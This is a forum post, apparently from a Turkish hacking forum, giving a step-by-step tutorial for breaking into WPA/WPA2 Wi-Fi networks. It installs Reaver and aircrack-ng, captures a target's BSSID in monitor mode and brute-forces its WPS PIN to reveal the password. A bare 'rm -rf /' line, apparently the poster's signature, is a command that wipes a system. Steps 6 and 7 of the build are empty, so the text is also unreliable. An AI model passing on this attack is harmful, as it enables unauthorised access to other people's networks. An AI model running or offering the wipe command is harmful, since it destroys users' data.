(How to hack a wi-fi with ubuntu)


Kıdemli Üye
25 Eki 2015
rm -rf /
Hey guys I'm Excellenthack today i gonna show you how to hack a wifi with ubuntu,linux.
1) Open terminal and type

sudo -s
and then type your password.

2) Download Reaver (Better Download the Latest Version ) Place in a specified folder.

3) Open the Terminal and type

tar xvfz reaver-1.4.tar.gz
4) Install dependencies

sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev
Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are very important.

5) Enter the folder by typing

cd reaver-1.4/src
6) Type

7) Type

8) Type

make install

Step 2 ( Hacking WPA/WPA2 Wireless)

After installing reaver 1.4, it’s time to proceed to the main part which is hacking wireless passwords that uses WPA/WPA2 Encryption.
Install aircrack-ng by typing

sudo apt-get install aircrack-ng
Airodump-ng / Airmon-ng commands

Reaver 1.4 (Install in Step 1)

1) We need to have the wireless BSSID (Mac address) so we use airodump-ng. Open a terminal and Type :

airmon-ng start wlan0

airodump-ng mon0
It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:28:32:49:55 )
2) Starting the attack type:

reaver -i mon0 -b 00:11:28:32:49:55
Now it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack.

Turkish Report:
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Katılımcı Üye
20 Eyl 2015
Yav tmm anladık çeviri timindesinizde hani bilmeyenler vvaar anlamayanlar var yapmayın :D

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